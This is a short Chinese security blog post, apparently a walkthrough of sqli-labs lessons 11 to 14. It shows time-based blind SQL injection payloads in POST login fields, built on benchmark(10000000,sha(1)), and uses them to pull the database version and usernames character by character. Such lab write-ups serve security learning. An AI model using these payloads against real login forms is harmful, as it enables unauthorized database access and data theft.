Less-11~14

  • A+
所属分类:安全博客

Less-11
这个页面采用POST的方法得到数据。于是用HackBar修改post数据进行测试:

uname=admin&passwd=password' and benchmark(10000000,sha(1))#&submit=Submit

测试发现,这个格式的注入使得服务器返回页面变慢,得知之后的benchmark语句得到执行。
所以再构造类似于

uname=admin&passwd=password' and left(version(),1)=5 and benchmark(10000000,sha(1))#&submit=Submit

的语句。如果返回结果变慢,则前面的left函数得到的结果是正确的,才会运行之后的benchmark函数。通过这种方法,可以一点一点地得到数据库的数据。
示例:

uname=admin&passwd=password' and left((select username from users where id = 1),4)='Dumb' and benchmark(10000000,sha(1))#&submit=Submit

Less-12
同上:

password") and benchmark(10000000,sha(1))#&submit=Submit

Less-13

password') and benchmark(10000000,sha(1))#&submit=Submit

Less-14

password" and benchmark(10000000,sha(1))#&submit=Submit

FROM :rickyhao.com | rickyhao.com

相关推荐: WeChall 总结

恕我孤陋寡闻,这几天才知道有WeChall这个神奇的网站。这个网站算是一个CTF刷题的站吧。有各种题目,还会搜集其他有CTF的网站。当然,应该还有其他这种类型的网站,嗯,求告诉~ 那么,就开始啦~ Training: Get Sourced 这题就是简单地查看…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: